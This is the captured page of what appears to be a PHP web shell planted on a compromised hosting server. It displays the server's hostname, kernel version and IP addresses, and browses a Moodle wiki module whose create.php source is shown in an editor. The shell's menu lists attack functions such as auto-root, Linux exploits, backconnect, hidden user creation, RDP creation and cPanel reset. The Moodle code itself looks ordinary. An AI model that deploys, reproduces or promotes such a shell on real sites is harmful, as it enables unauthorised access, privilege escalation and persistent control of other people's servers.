Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.59.197
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
wiki /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
diff
[ DIR ]
drwxr-xr-x
editors
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
parser
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
README
138
B
-rw-r--r--
admin.php
4.24
KB
-rw-rw-r--
comments.php
2.49
KB
-rw-rw-r--
comments_form.php
1.44
KB
-rw-rw-r--
create.php
4.01
KB
-rw-r--r--
create_form.php
3.68
KB
-rw-r--r--
diff.php
2.86
KB
-rw-rw-r--
edit.php
4.1
KB
-rw-rw-r--
edit_form.php
5.22
KB
-rw-r--r--
editcomments.php
2.36
KB
-rw-rw-r--
files.php
4.13
KB
-rw-rw-r--
filesedit.php
3.77
KB
-rw-rw-r--
filesedit_form.php
1.66
KB
-rw-r--r--
history.php
2.69
KB
-rw-rw-r--
index.php
3.04
KB
-rw-r--r--
instancecomments.php
3.34
KB
-rw-rw-r--
lib.php
28.77
KB
-rw-rw-r--
locallib.php
60.84
KB
-rw-r--r--
lock.php
2.43
KB
-rw-r--r--
map.php
2.66
KB
-rw-rw-r--
mod_form.php
4.29
KB
-rw-r--r--
module.js
4.25
KB
-rw-r--r--
overridelocks.php
2.47
KB
-rw-r--r--
pagelib.php
95.7
KB
-rw-rw-r--
prettyview.php
2.29
KB
-rw-r--r--
renderer.php
25.49
KB
-rw-rw-r--
restoreversion.php
2.49
KB
-rw-rw-r--
search.php
2.87
KB
-rw-r--r--
styles.css
5.55
KB
-rw-rw-r--
upgrade.txt
902
B
-rw-rw-r--
version.php
1.44
KB
-rw-rw-r--
view.php
9.89
KB
-rw-rw-r--
viewversion.php
2.65
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. require_once('../../config.php'); require_once(__DIR__ . '/create_form.php'); require_once($CFG->dirroot . '/mod/wiki/lib.php'); require_once($CFG->dirroot . '/mod/wiki/locallib.php'); require_once($CFG->dirroot . '/mod/wiki/pagelib.php'); // this page accepts two actions: new and create // 'new' action will display a form contains page title and page format // selections // 'create' action will create a new page in db, and redirect to // page editing page. $action = optional_param('action', 'new', PARAM_TEXT); $wid = optional_param('wid', 0, PARAM_INT); $swid = optional_param('swid', 0, PARAM_INT); $group = optional_param('group', 0, PARAM_INT); $uid = optional_param('uid', 0, PARAM_INT); // 'create' action must be submitted by moodle form // so sesskey must be checked if ($action == 'create') { if (!confirm_sesskey()) { print_error('invalidsesskey'); } } if (!empty($swid)) { $subwiki = wiki_get_subwiki($swid); if (!$wiki = wiki_get_wiki($subwiki->wikiid)) { print_error('incorrectwikiid', 'wiki'); } } else { $subwiki = wiki_get_subwiki_by_group($wid, $group, $uid); if (!$wiki = wiki_get_wiki($wid)) { print_error('incorrectwikiid', 'wiki'); } } if (!$cm = get_coursemodule_from_instance('wiki', $wiki->id)) { print_error('invalidcoursemodule'); } $groups = new stdClass(); if (groups_get_activity_groupmode($cm)) { $modulecontext = context_module::instance($cm->id); $canaccessgroups = has_capability('moodle/site:accessallgroups', $modulecontext); if ($canaccessgroups) { $groups->availablegroups = groups_get_all_groups($cm->course); $allpart = new stdClass(); $allpart->id = '0'; $allpart->name = get_string('allparticipants'); array_unshift($groups->availablegroups, $allpart); } else { $groups->availablegroups = groups_get_all_groups($cm->course, $USER->id); } if (!empty($group)) { $groups->currentgroup = $group; } else { $groups->currentgroup = groups_get_activity_group($cm); } } $course = $DB->get_record('course', array('id' => $cm->course), '*', MUST_EXIST); require_login($course, true, $cm); // The title of the new page, cannot be empty. $title = optional_param('title', get_string('newpage', 'wiki'), PARAM_TEXT); $wikipage = new page_wiki_create($wiki, $subwiki, $cm); if (!empty($swid)) { $wikipage->set_gid($subwiki->groupid); $wikipage->set_uid($subwiki->userid); $wikipage->set_swid($swid); } else { $wikipage->set_wid($wid); $wikipage->set_gid($group); $wikipage->set_uid($uid); } $wikipage->set_availablegroups($groups); $wikipage->set_title($title); // set page action, and initialise moodle form $wikipage->set_action($action); switch ($action) { case 'create': $newpageid = $wikipage->create_page($title); redirect($CFG->wwwroot . '/mod/wiki/edit.php?pageid='.$newpageid); break; case 'new': // Go straight to editing if we know the page title and we're in force format mode. if ((int)$wiki->forceformat == 1 && $title != get_string('newpage', 'wiki')) { $newpageid = $wikipage->create_page($title); redirect($CFG->wwwroot . '/mod/wiki/edit.php?pageid='.$newpageid); } else { $wikipage->print_header(); // Create a new page. $wikipage->print_content($title); } $wikipage->print_footer(); break; }
Close